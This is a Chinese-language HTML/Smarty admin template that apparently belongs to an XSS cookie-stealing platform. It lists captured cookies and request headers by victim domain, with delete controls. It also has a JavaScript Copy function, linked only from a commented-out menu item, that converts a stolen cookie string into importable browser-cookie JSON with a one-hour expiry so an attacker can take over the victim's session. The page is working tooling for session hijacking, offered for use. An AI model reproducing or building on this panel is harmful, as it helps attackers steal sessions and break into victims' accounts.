<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>cookie查看模式 - {$show.sitename} - {$show.sitedesc}</title>
<meta name="keywords" content="{$show.keywords}" />
<meta name="description" content="{$show.description}" />
<link type="text/css" rel="stylesheet" href="style/style.css" />
<link rel="shortcut icon" href="{$url.root}/favicon.ico" />
<script type="text/javascript" src="{$url.root}/source/js/jquery.js"></script>
<link type="text/css" rel="stylesheet" href="{$url.root}/source/js/boxy/boxy.css" />
<script type="text/javascript" src="{$url.root}/source/js/boxy/jquery.boxy.js"></script>
{literal}
<style>
#ul1 { margin:0; width:220px; overflow:scroll-x; word-break:break-all}
.ohidden ul { height:18px; overflow:hidden }
a.oall,a.un { text-decoration:none }
td { vertical-align:top }
DIV.meneame {
	PADDING-RIGHT: 3px; PADDING-LEFT: 3px; FONT-SIZE: 80%; PADDING-BOTTOM: 3px; MARGIN: 3px; COLOR: #0073aa; PADDING-TOP: 3px; TEXT-ALIGN: center
}
DIV.meneame A {
	BORDER-RIGHT: #0072ff 1px solid; PADDING-RIGHT: 7px; BACKGROUND-POSITION: 50% bottom; BORDER-TOP: #0072ff 1px solid; PADDING-LEFT: 7px; BACKGROUND-IMAGE: url(../themes/default/css/style/meneamelan.jpg); PADDING-BOTTOM: 5px; BORDER-LEFT: #0072ff 1px solid; COLOR: #0073aa; MARGIN-RIGHT: 3px; PADDING-TOP: 5px; BORDER-BOTTOM: #0072ff 1px solid; TEXT-DECORATION: none
}
DIV.meneame A:hover {
	BORDER-RIGHT: #0072ff 1px solid; BORDER-TOP: #0072ff 1px solid; BACKGROUND-IMAGE: none; BORDER-LEFT: #0072ff 1px solid; COLOR: #0073aa; BORDER-BOTTOM: #0072ff 1px solid; BACKGROUND-COLOR: #ffffff
}
DIV.meneame A:active {
	BORDER-RIGHT: #0072ff 1px solid; BORDER-TOP: #0072ff 1px solid; BACKGROUND-IMAGE: none; BORDER-LEFT: #0072ff 1px solid; COLOR: #0073aa; BORDER-BOTTOM: #0072ff 1px solid; BACKGROUND-COLOR: #ffffff
}
DIV.meneame SPAN.current {
	BORDER-RIGHT: #0073aa 1px solid; PADDING-RIGHT: 7px; BORDER-TOP: #0073aa 1px solid; PADDING-LEFT: 7px; FONT-WEIGHT: bold; PADDING-BOTTOM: 5px; BORDER-LEFT: #0073aa 1px solid; COLOR: #0073aa; MARGIN-RIGHT: 3px; PADDING-TOP: 5px; BORDER-BOTTOM: #0073aa 1px solid; BACKGROUND-COLOR: #94ddff
}
DIV.meneame SPAN.disabled {
	BORDER-RIGHT: #ffe3c6 1px solid; PADDING-RIGHT: 7px; BORDER-TOP: #ffe3c6 1px solid; PADDING-LEFT: 7px; PADDING-BOTTOM: 5px; BORDER-LEFT: #ffe3c6 1px solid; COLOR: #ffe3c6; MARGIN-RIGHT: 3px; PADDING-TOP: 5px; BORDER-BOTTOM: #ffe3c6 1px solid
}
</style>
<script type="text/javascript">
$(document).ready(function(){
	$("a.oall").click(function(){
		if($(this).attr("class")=="oall"){
			$("table tbody tr").attr("class","");
			$("a.un").html("-折叠");
			$(this).attr("class","uall");
			$(this).html("-全部");	
		}else{
			$("table tbody tr").attr("class","ohidden");
			$("a.un").html("+展开");
			$(this).attr("class","oall");
			$(this).html("+全部");	
		}
	});
	$("a.un").click(function(){
		if($(this).parent().parent().attr("class")=="ohidden"){
			$(this).parent().parent().attr("class","");
			$(this).html("-折叠");
		}else{
			$(this).parent().parent().attr("class","ohidden");
			$(this).html("+展开");	
		}
	});
});
function Delete(id,obj,token){
	if(confirm("确定删除吗?")){
		$.post('?do=admin_module&act=delcontent&r='+Math.random(),{'id':id,'token':token},function(re){
			if(re==1){
				$(obj).parent().parent().remove();
			}
		});
	}
}
function MutiDelete(){
	if(confirm("确定删除选中的内容吗?")){
		var ids=[];
		$.each($(".checon"),function(k,v){
			if($(v).is(":checked")) ids.push($(v).val());
		});
		$.post('?do=admin_module&act=delcontents&r='+Math.random(),{'ids':ids.join("|"),'token':$("#token").val()},function(re){
			if(re==1){
				$(".checon").parent().parent().remove();
			}
		});
	}
}
function CheckAll(obj){
	if($(obj).is(":checked")){
		$(".checon").attr("checked","checked");
	}else{
		$(".checon").removeAttr("checked");
	}
}
function Copy(obj) { 
  var table = $(obj).parent().parent(); 
  var l = table.find("#location").text(); 
  var c = table.find("#cookie").text(); 
  var t = l.split('//')[1]; 
  t = t.split('/')[0]; 
  var d = ""; 
  var t2 = t.split('.'); 
  for (key in t2) { 
    if (key == 0) { 
      continue; 
    } 
    d = d + '.' + t2[key]; 
  }; 
  var arr = c.split(';'); 
  var data = []; 
  for (var key in arr) { 
    var arr2 = arr[key].split('='); 
    data.push(cookie(d,arr2[0], arr2[1])); 
  } 
  alert(JSON.stringify(data)); 
} 

function cookie(d,n,v) 
{ 
  var row ={     
    "domain" : d, 
    "expirationDate" : Math.round(new Date().getTime()/1000)+3600, 
    "hostOnly" : false, 
    "httpOnly" : false, 
    "name" : n.replace(/^\s+|\s+$/g,''), 
    "path" : "\/", 
    "secure" : false, 
    "session" : false, 
    "storeId" : "0", 
    "value" : v.replace(/^\s+|\s+$/g,'') 
    }; 
  return row; 
}
</script>
{/literal}
</head>
<body>
{include file="admin_header.html"}
<div class="wrapper">
	<div class="main">
		{include file="admin_menu.html"}
		<div class="content">
			<h3>all-cookie-list      Domain: 
    <select onchange="location.href='{$url.root}/admin/index.php?do=admin_module&act=allcookie&domain='+this.value">
    	<option value="">全部</option>
        {foreach from=$domains item=v}
        <option value="{$v}"{if $v==$domain} selected="selected"{/if}>{$v}</option>
        {/foreach}
    </select> </h3>
	
	
		<div class="data" style="padding: 1px;">
				<table cellpadding="0" cellspacing="0" width="100%">
	<thead>
		<tr>
			<th width="20"><input type="checkbox" id="checkall" onclick="CheckAll(this)" /></th>
        	<th width="60"><a href="javascript:void(0)" class="oall" style="font-weight:normal">+全部</a></th>
        	<th width="120">时间</th>
        	<th width="220">接收的内容</th>
			<th width="220">Request Headers</th>
            <th width="80">操作</th>
		</tr>
	</thead>
<tbody>
		{foreach from=$contents item=v}
		<tr class="ohidden">
			<td><input type="checkbox" class="checon" value="{$v.id}" /></td>
        	<td><a href="javascript:void(0)" class="un">+展开</a></td>
        	<td>{$v.addTime|@date_format:"%Y-%m-%d %H:%M:%S"}</td>
			<td>
                <ul id="ul1">
                {foreach from=$v.content key=ck item=c}
                <li>{$ck} : {$c}</li>
                {/foreach}	
                </ul>
            </td>
            <td>
                <ul id="ul1">
                {foreach from=$v.serverContent key=sk item=s}
                <li>{$sk} : {$s}</li>
                {/foreach}	
                </ul>
            </td>
            <td><a href="javascript:void(0)" onclick="Delete('{$v.id}',this,'{$show.user.token}')">删除</a>
			<!--
			&nbsp;&nbsp;<a href="javascript:void(0)" onclick="Copy(this)">复制</a> 
			-->
			</td>
		</tr>
		{/foreach}
	</tbody>
				</table>
				<hr/>
		<div class="meneame">
			{$pagers}<a >共{$pages}页</a>
		</div>
<div style="padding:5px 10px">选中项操作：<a href="javascript:void(0)" onclick="MutiDelete()">删除</a></div>
			<div>
			
		</div>
	</div>
</div>
{include file="admin_footer.html"}
<script language="javascript" src="{$url.themePath}/js/ToolTip.js"></script>
</body>
</html>